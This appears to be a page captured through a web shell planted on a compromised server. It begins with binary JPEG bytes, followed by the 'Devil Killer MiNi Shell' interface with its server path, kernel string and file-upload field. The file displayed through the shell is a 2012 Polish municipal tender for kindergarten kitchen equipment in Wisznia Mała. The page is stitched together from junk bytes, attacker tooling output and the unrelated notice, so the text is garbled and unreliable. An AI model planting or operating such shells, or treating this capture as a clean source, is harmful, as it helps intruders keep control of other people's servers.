JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120727/164313-N-2012.html

<p class="kh_header"><b>Wisznia Mała: Dostawa mebli i urządzeń  kuchennych do przedszkola w Strzeszowie, gmina Wisznia Mała</b><br>
<b>Numer ogłoszenia: 164313 - 2012; data zamieszczenia: 27.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisznia Mała , ul. Wrocławska 9, 55-114 Wisznia Mała, woj. dolnośląskie, tel. 071 3127025, faks 071 3127068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiszniamala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli i urządzeń  kuchennych do przedszkola w Strzeszowie, gmina Wisznia Mała.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot niniejszego zamówienia obejmuje wykonanie dostawy wraz z rozmieszczeniem i uruchomieniem sprzętu gastronomicznego w ramach zadania pn. /Dostawa mebli i urządzeń kuchennych do przedszkola w Strzeszowie, gmina Wisznia Mała/.
2.	Przedmiot zamówienia według kodu CPV: 
opis	Słownik główny
Przemysłowy sprzęt kuchenny	39314000-6 
3.	Miejsce realizacji przedmiotu zamówienia to Przedszkole w Strzeszowie ul. Lipowa 35, 
55-114 Wisznia Mała, gmina Wisznia Mała.
4.	Sposób wykonani przedmiotu zamówienia opisany został w:
a)	załączniku nr 1 do niniejszego OPZ - Projekcie technologicznym - Blok żywienia Przedszkole w miejscowości Strzeszów woj. Dolnośląskie Pietrucha & Mroziuk Projekt, Wrocław, 06 maja 2011, 
b)	Wykazie sprzętu - stanowiącym załącznik do niniejszego OPZ, w którym opisano  minimalne wymagania dotyczące parametrów technicznych przedmiotu zamówienia, oraz 
c)	we wzorze umowy, stanowiącej integralną część (II) niniejszej SIWZ - Wzór Umowy.

5.	Szczegółowy opis i zakres dostawy przedstawiony został w Części III niniejszej SIWZ - pn. Opis Przedmiotu Zamówienia (tj. OPZ).

Wykaz Sprzętu

Lp.	NAZWA URZĄDZENIA	WYMIARY
szer/głęb/wys	ilość	Minimalne parametry techniczne   	zasilanie wod.-kan.	minimalne zasilanie elektryczne
		[mm]	szt.			V	kW 
0	komora chłodnicza o pojemności 9,9 m3

	1950/2550/2290 mm

tolerancja dla wysokości: ?50 mm	1	-	panel o grubości 60 mm wypełniony pianką poliuretanową (o gęstości min. 42kg/m3) pomiędzy płatami blachy stalowej, pokrytej od strony roboczej 120-micronową warstwą  PVC
-współczynnik K nie gorszy niż 0,023 W/moK
-panele łączone poprzez zamki umożliwiające montaż komory /od wewnątrz/
- kolor: RAL9010
-	wszystkie łączenia paneli wewnątrz wyoblone
-	drzwi 80 x 200H cm 
-	zamknięcie zewnętrzne drzwi wykonane z plastiku (mocowania) i stali nierdzewnej (uchwyt); wyposażone w zamek i kmpl. 3 szt. kluczy
-	zamknięcie wewnętrzne poprzez rotacyjny (bezpieczny) uchwyt 
-	oświetlenie wewnątrz komory		-	0
0.1	monoblok sufitowy	max. wysokość ponad górną krawędź sufitu: 400 mm	1	-	moc chłodnicza: 1319W ?5%
-	temp. robocza w komorze: 0oC, 
+5 oC (dla temp. zewn. 
max. +45 oC)		230	1,0
0.2	regał 	1070/610/1820
?5%	2	-	wykonane ze stali chromoniklowanej
-	ażurowe		-	0
1	szafa chłodnicza	600/600/1850	3	-	temp. robocza w komorze: 
0oC/+2 oC
-	umożliwiająca przechowywanie próbek żywności
-	nogi z regulowaną wysokością
-	możliwość regulowania temperatury		1x230	1,5
2	stół z komorą zlewozmywaka 
i półką	1200/700/850	2	-	wykonanie: stal nierdzewna
-	rant z tyłu blatu 
-	komora: 500/400/250 mm		-	0
2.1	bateria stojąca 2-otworowa	dł. wylewki: 
250 mm	2	-	mieszacz cw/zw
-	wykonanie chromo-niklowane	cw/zw	-	0
2.2	odpływ 	2-	2	-	materiał nierdzewny - metal	F50	-	0
3	naświetlacz do jaj 	-	1	-	przenośny
-	na minimum 30 jaj		230	0.1
4	stół do oczkowania	1200/700/850	1	-	wykonanie: stal nierdzewna
-	rant z tyłu i z prawej strony blatu
-	rura przelewowa na wyposażeniu
-	deska poliamidowa do krojenia
-	plastikowy zasobnik na odpadki		-	
4.1	bateria wisząca	dł. wylewki: 
250 mm	1	-	mieszacz cw/zw
-	wykonanie chromo-niklowane	cw/zw	-	0
4.2	odpływ 	2-	1	-	materiał nierdzewny - metal	F50	-	0
5	obieraczka do ziemniaków 	wysokość dolnej krawędzi otworu wyrzutowego obranych ziemniaków / warzyw z urządzenia (posadowione na filtrze obierzyn)  
od 850 do 950 mm 
	1	-	wykonanie: stal nierdzewna
-	jednorazowy wsad: min. 20 kg
-	czas obierania: 1,5 - 2,5 minut
-	przeźroczysta pokrywa
-	wyłącznik bezpieczeństwa 
w  pokrywie i klapie spustowej urządzenia
-	dodatkowo zewnętrzny (czerwony) przycisk STOP w obudowie urządzenia
-	moc silnika: 1,5 HP
-	obroty tarczy obierającej: 300 r.p.m.

na wyposażeniu: podstawa z łapaczem obierzyn, o wysokości umożliwiającej bezpośredni wyrzut z obieraczki do stołu do oczkowania (4)	zw	400	0,9
6	basen mobilny	700/580/575H
	1	-	wykonanie: stal nierdzewna
-	pojemność: 2 x 1/1GN H200 perforowany - pojemniki z uchwytami zawiasowymi na wyposażeniu		-	0
7	wózek bemarowy - zamykany pokrywami (suwanymi lub podnoszonymi)
	900/686/910
?5%	2	-	wykonanie: stal nierdzewna kwasoodporna 18/10
-	blat wózka przetłaczany w celu zabezpieczenia przed rozlewaniem się płynnych posiłków
-	ergonomiczny uchwyt z plastikowym zaczepem do przewodu zasilającego
-	naroża wózka z odbojnikami ze sprężystego, nie smarującego materiału
-	średnica kół: min. 125 mm
-	dwa koła łożyskowane; na dwóch kołach hamulce
-	pojemność: 2- GN1/1 H200
-	klasa szczelności: zgodnie z polską normą PN-EN60 529
-	zakres regulacji temperatury: +30oC +90 oC		2x230	3,6
8	stół podawczy do zmywarki kapturowej	1200/790/900	1	-	wykonanie: stal nierdzewna
-	rant z tyłu blatu: 200 mm
-	komora zlewozmywaka 500-400-250		-	0
8.1	bateria stojąca, 2-otworowa z wylewką typu /podniesione C/ oraz prysznicem na stelażu	wysięg wylewki: 250	1	-	wykonanie chromo-niklowe	cw/zw	-	0
8.2	odpływ	2-	1	-	materiał nierdzewny - metal	F50	-	0
9	zmywarka gastronomiczna

	620/760/1587
(1967 otwarta)
?10cm,
jednak o wysokości nie większej niż 850 mm	1	-	wykonanie: stal nierdzewna
-	automatyczne napełnianie zbiornika
-	zawór anty-zwrotny
-	wbudowany dozownik nabłyszczacza
-	wyjście ze zbiornika myjącego - do podłączenia detergentu
-	moc grzałek bojlera: min. 4,5 kW
-	długość cyklu: 1 / 2 / 3 minuty
-	wymagana temperatura dezynfekcji termicznej minimum +85oC
-	na wyposażeniu:
- kosz na talerze: 2 szt.
- kosz na kubki 6x6 z jednym przedłużaczem: 1 szt.
- koszyk na sztućce: 8 szt
- kosz uniwersalny (do ustawienia koszyków ze sztućcami): 1 szt.
- kosz z otwartym bokiem (na pojemniki GN): 1 szt.	F50	400	5,3
9.1	zmiękczacz wody 	maksymalna wysokość 
850 mm	1	-	obudowa: stal nierdzewna
-	manualny
-	pojemność nie większa niż 16 l	wz	-	0
10	stół odbiorczy ze zmywarki kapturowej	700/592/900	1	-	wykonanie: stal nierdzewna
-	1 rząd prowadnic na kosze do zmywarki 500-500		-	0
11	szafa przelotowa z drzwiami suwanymi - na naczynia	1000/600/2000	1	-	wykonanie: stal nierdzewna
-	2 segmenty drzwi rozsuwanych		-	0
12	stół z półką	1500/700/850	1	-	wykonanie stal nierdzewna 
-	rant z tyłu i z prawej strony blatu		-	0
13	stół podgrzewany - przelotowy	1200/700/850	2	-	wykonanie: stal nierdzewna
-	blat płaski
-	zakres temp. +30/+60oC		2x230	2,8
14	szafa chłodniczo-mroźnicza, 
2-drzwiowa

	700/860/2000
?5%
	1	-	wykonanie stal nierdzewna 
-	lewa
-	wielkość: GN2/1
-	pojemność: 2-350 ltr
-	grubość izolacji: 60 mm
-	zakres temp. -2/+10oC oraz 
-14/-18oC		230	0,61
15	stół z komorą zlewozmywaka, półką 
i blokiem szuflad	1850/700/850	2	-	wykonanie: stal nierdzewna
-	rant z tyłu i z prawej/lewej strony blatu 
-	komora: 500/400/250 mm		-	0
15.1	bateria stojąca 2-otworowa	dł. wylewki:  250 mm	2	-	mieszacz cw/zw
-	wykonanie chromo-niklowane	cw/zw	-	0
15.2	odpływ 	2-	2	-	materiał nierdzewny - metal	F50	-	0
16	urządzenie do zmiękczania (rozbijania) mięsa
		1	-	2 ostrza o średnicy 180 micronów 
-	wielkość otworu wsadowego: minimum 150/20 mm 
-	materiał noża: stal nierdzewna 
-	obudowa: stal nierdzewna		230	0,2
17	wilk do mielenia mięsa		1	-	wykonanie: stal nierdzewna 
-	wielkość: /32/
-	wydajność minimum 6 kg na 1 wsad
-	moc: 3 HP (napęd wentylowany)
-	klasa szczelności: zgodnie z polską normą PN-EN60 529		400	2,2
19	krajalnica do warzyw 

	maksymalnie 320/620/590	1	-	obudowa: stal nierdzewna
-	silnik wentylowany
-	średnica tarczy: 180-210 mm
-	obroty tarczy: 300-400 r.p.m
na wyposażeniu:
- tarcze umożliwiające krojenie plastrów
  o grubości od 1 do 8 mm
- tarcza do wiórek
- tarcza do ścierania
- zestaw tarcz do kostkowania: 8 x 8 mm		230	0,6
20	basen dwukomorowy	1400/700/850	1	-	stal nierdzewna		-	0
20.1	bateria stojąca, 2-otworowa z wylewką typu /podniesione C/ oraz prysznicem na stelażu	wysięg wylewki: 250	1	-	wykonanie chromo-niklowe	cw/zw	-	0
20.2	odpływ	2-	2	-	materiał nierdzewny - metal	F50	-	0
21	regał ociekowy	1000/600/1800	1	-	wykonanie stal nierdzewna
-	półki spawane		-	0
22	taboret gazowy	600/650/400	1	-	wykonanie: stal nierdzewna
-	palnik 9,0 kW (zużycie gazu max. 0,71 kg/h)	cw	-	0
23	patelnia elektryczna 	800/700/850	1	-	wykonanie: stal nierdzewna
-	wychylana hydrauliczne bądź elektryczne
-	misa ze stali nisko-węglowej / żeliwnej
-	pojemność misy: 50 ltr
-	zakres regulacji temp.: +45 do +300oC	cw	max
400	8,7
24	stanowisko neutralne 	350/700/280	1	-	wykonanie: stal nierdzewna
-	mocowane do trzonu i patelni		-	0
25	trzon 6-płytowy z powiększonym piekarnikiem konwekcyjnym	maksymalnie 1200/700/900
przy czym należy wziąć pod uwagę - czytać łącznie z pozycją 27 (wymiary stołu z półką)	1	-	elektryczny
-	piekarnik powiększony (znajdujący się pod 6 palnikami)
-	wykonanie: stal nierdzewna
-	moc płyt: min. 6-2,0 kW 
-	moc grzałek piekarnika: min.5,0 kW		400	17,0
25.1	kolumna do napełniania wodą 
z wylewką i zaworem odcinającym	H700
wysięg: 440	1	-	wykonanie: stal chromoniklowana
-	montowane w narożnikach elementu neutralnego	wz	-	0
26	piec konwekcyjno-parowy 

	605/700/535
	1	-	wykonanie: stal nierdzewna
-	pojemność: 5GN2/3 H65
-	zawieszony na ścianie
-	funkcje:
- pieczenie konwekcyjne (50-270-C)
- gotowanie w parze (50-100-C)
- połączenie konwekcji z parą (50-210-C)
-	możliwość /wypuszczenia/ pary wodnej z komory pieca (jeśli następnym etapem ma być /suche/ pieczenie)
-	rewersyjne obroty termo-dmuchawy 
-	na wyposażeniu:
 -filtr tłuszczowy
 - prysznic do mycia komory pieca, o długości 1,5 m w oplocie chromo-niklowym	wc	400	3,9
26.1	zmiękczacz wody 	o wysokości nie większej niż 850 mm	1	-	obudowa: stal nierdzewna
-	manualny
-	o pojemności minimum 16 l	wz	-	0
27	stół z półką	1000/700/850
przy czym wymiary stołu należy czytać łącznie z pozycją 25 
- wymiary trzonu 6-płytowego z powiększonym piekarnikiem konwekcyjnym	1	-	wykonanie stal nierdzewna 
-	rant z tyłu blatu
-	blok prowadnic na pojemniki GN2/3		-	0
28	okap przyścienny z łapaczami tłuszczu i oświetleniem	2000/900/500	2	-	wykonanie: stal nierdzewna
-	przepływ max.: 2000 m3/h		230	0,2
29	mikser spiralny		1	-	misa ze stali nierdzewnej
-	pojemność: minimum 20 ltr		230	0,75
30	stół z blatem poliamidowy, bez półki	1000/700/850	1	-	wykonanie stal nierdzewna 
-	blat płaski		-	0
31	szafka wisząca 	1000/300/600	1	-	wykonanie stal nierdzewna
-	drzwi suwane		-	0
A	młynek do mielenia odpadków			-	obudowa: stal nierdzewna,
-	tarcza rozdrabniająca: stal 
-	nierdzewna,
-	 zabezpieczenie pneumatyczne,
-	włącznik neumatyczny,
-	cicha praca,
-	otwór w zlewie średnica: 90 mm,
-	umożliwiający mielenie kości 
kurczaka		230	0,5
B	waga spożywcza			-	elektroniczna z legalizacją,
-	duży wyświetlacz
-	elektroniczny,
-	zakres ważenia do 10 kg, z dokładnością    wyświetlania do 0,005 kg,
-	wymiary szalki min. 
-	230/190mm
-	szalka ze stali nierdzewnej,
-	wielokrotne tarowanie,
-	zasilanie na baterie i    zasilaczem sieciowym		230.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, zgodnie z zapisem art. 67 ust. 1 pkt 7 Ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postepowaniu nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 1 dostawę sprzętu gastronomicznego w tym co najmniej: komory chłodniczej, mebli kuchennych (gastronomicznych) o wartości minimum 50.000 PLN netto każda,
	(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
	Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie na podstawie złożonego oświadczenia i dokumentów, według zapisów punktu 6.1. niniejszej IDW.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w Punkcie 6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Sporządzony przez wykonawcę Formularz Ofertowy stanowiący załącznik nr 1 do IDW;
b. oświadczenie o spełnianiu warunków udziału w postępowaniu, w zakresie zapisów art. 22 ust. 1 Ustawy Pzp, opisane w punkcie 8 niniejszej IDW, sporządzone według Załącznika nr 2 do IDW, (Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy);
c. Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, przedstawia w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonaniu zamówienia.
d. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp, wymienionych w ust. 2 lub ust. e. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy Pzp, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty dołączone powinno być pełnomocnictwo w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
f. Każdy z wykonawców występujących wspólnie powinien nie podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp. Każdy z nich powinien złożyć dokumenty w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę zawartej Umowy w stosunku do treści oferty Wykonawcy, na podstawie określonych poniżej warunków:
-   	zmiany terminu realizacji przedmiotu zamówienia tj. wykonania usługi montażu, w przypadku braku gotowości odpowiednich pomieszczeń do montażu,  
- zmiany parametrów zaoferowanych mebli i urządzeń, tylko w przypadku zaoferowania parametrów lepszych niż w ofercie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiszniamala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała ul. Wrocławska 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2012 godzina 10:00, miejsce: Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała ul. Wrocławska 9 pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





